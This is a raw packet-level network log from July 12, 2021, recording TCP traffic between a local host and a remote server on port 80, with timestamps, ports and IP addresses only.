Jul 12, 2021 10:28:46.391326904 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391351938 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391366959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391395092 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391407967 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391432047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391457081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391474962 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391494989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391519070 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391542912 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391552925 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391573906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391597033 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391824007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391855955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391879082 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.391896963 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391933918 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.391954899 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392064095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392087936 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392107964 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392128944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392143965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392167091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392278910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392339945 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392362118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392383099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392432928 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392441034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392465115 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392491102 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392514944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392525911 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392546892 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392565012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392580986 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392606020 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392633915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392657042 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392682076 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392709017 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392714977 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392767906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392776012 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.392798901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.392842054 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.393207073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393263102 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.393388987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393416882 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393465996 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.393486023 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393513918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393539906 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393562078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393584013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393618107 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.393632889 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.393739939 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393790960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393805027 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.393848896 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393871069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393896103 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.393954039 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.393975019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394001007 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394010067 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394035101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394057989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394079924 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394093990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394121885 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394150019 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394156933 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394167900 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394192934 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394215107 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394241095 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394247055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394265890 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394285917 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394790888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394819021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394845009 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394854069 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394876003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394897938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394907951 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394931078 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394938946 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.394965887 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.394990921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395020962 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395162106 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395186901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395215988 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395227909 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395251989 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395282030 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395288944 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395313025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395335913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395347118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395368099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395378113 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395401955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395426035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395446062 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395458937 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395482063 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395508051 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395514965 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395534992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395555019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395567894 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395591021 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395612955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.395622015 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.395682096 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396117926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396145105 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396186113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396193981 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396219969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396258116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396269083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396291018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396311045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396339893 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396483898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396542072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396564007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396589041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396614075 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396632910 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396648884 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396673918 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396697044 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396712065 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396740913 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396764040 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396780968 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396806955 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396827936 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396842003 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396867990 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396886110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396903038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396925926 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396948099 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.396964073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.396986961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397013903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397023916 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.397073030 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.397548914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397579908 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397628069 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.397665977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397690058 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397710085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397752047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397764921 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.397793055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397803068 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.397826910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.397892952 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398159027 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398186922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398210049 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398240089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398247957 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398297071 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398325920 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398435116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398483038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398502111 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398538113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398565054 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398590088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398602009 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398627043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398647070 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398660898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398683071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398710012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398719072 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398742914 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398766994 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398775101 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398797035 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398828983 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398837090 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398859978 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398884058 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398895025 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398921013 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398943901 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.398952007 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.398977041 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399007082 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399219036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399249077 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399271011 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399296045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399348974 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399379969 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399405956 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399432898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399446011 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399466038 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399490118 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399513960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399521112 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399544954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399558067 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399575949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399597883 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399622917 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399629116 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399662018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399681091 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399696112 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399722099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399744034 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.399754047 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.399795055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400105000 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400129080 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400150061 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400173903 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400181055 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400207043 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400234938 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400242090 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400262117 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400286913 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400561094 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400588036 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400612116 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400634050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400651932 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400665045 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400679111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400702953 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400724888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400744915 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400753975 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400774002 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400784016 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400803089 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400825977 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400831938 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.400849104 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.400873899 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.401804924 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.401837111 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.401859045 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.401871920 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.401895046 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.401904106 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.401923895 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.401964903 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402287960 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402318954 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402342081 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402394056 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402410984 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402436972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402457952 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402483940 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402506113 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402525902 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402548075 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402560949 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402573109 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402591944 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402612925 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402636051 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402647018 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402671099 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402693987 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402705908 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402724028 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402740002 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402755022 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402777910 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402800083 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402811050 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402832985 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402853012 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402868986 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402890921 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402915001 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402926922 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402955055 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.402970076 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.402991056 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403014898 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403036118 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.403047085 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403094053 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.403423071 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403445959 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403470993 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403495073 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403503895 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.403525114 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403554916 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403561115 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.403603077 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.403841972 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403878927 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403903961 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403927088 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.403942108 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403965950 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.403994083 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404004097 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404031992 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404052019 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404069901 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404095888 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404123068 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404129028 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404154062 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404179096 CEST	80	49720	47.254.186.176	192.168.2.3
Jul 12, 2021 10:28:46.404189110 CEST	49720	80	192.168.2.3	47.254.186.176
Jul 12, 2021 10:28:46.404210091 CEST	80	49720	47.254.186.176	192.168.2.3
